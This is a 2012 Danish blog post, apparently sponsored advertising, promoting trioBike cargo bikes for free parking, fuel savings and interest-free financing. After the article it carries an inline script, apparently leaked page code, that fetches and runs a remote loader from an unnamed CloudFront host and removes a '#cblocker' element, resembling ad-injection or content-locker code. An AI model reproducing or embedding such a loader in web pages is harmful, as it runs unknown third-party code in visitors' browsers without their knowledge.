Smartlog v3 » Tips, Guides & Informationer » Vil du også have gratis parkering?
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Vil du også have gratis parkering?

24. Jul 2012 14:52, webmayn

Fortvivl ej! Gør som stadig flere danskere: invester i en ladcykel og nyd godt af alle de mange fordele, du har som ladcyklist. 

 

Mange kan naturligvis se fordelen i den miljørigtige dille, men der hvor det kommer ladcyklisten til gode, er på pengepungen – og det er helt uden at gå på kompromis med pladsen eller sikkerheden. trioBikes ladcykler rummer op til fire børn i én og samme ladcykel, hvilket giver mange muligheder for både afhentning af børn samt indkøb. Samtidig er sikkerheden i top med en sikkerhedsgodkendelse af Forbrugerstyrelsen.

 

Pludselig er det ikke et projekt at skulle hente flere børn eller smutte en tur på storindkøb, hvis ikke man har en bil – man hopper blot op på sin trioBike. Og indkøbene kan endda blive mange flere, nu når benzinen bliver sparet væk!

 

Som mange andre københavnere nyder man også den gratis parkering, som ellers kan løbe op i mange penge årligt, og man slipper tilmed også for spekulationerne om pladsproblemer på parkeringspladserne foran lejligheden. En ladcykel er derfor en god investering, og hos trioBike får du ikke alene ladcyklerne til en god pris, de kan samtidig betales med et rentefrit lån uden udbetaling, gebyrer, etableringsomkostninger eller renter.

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede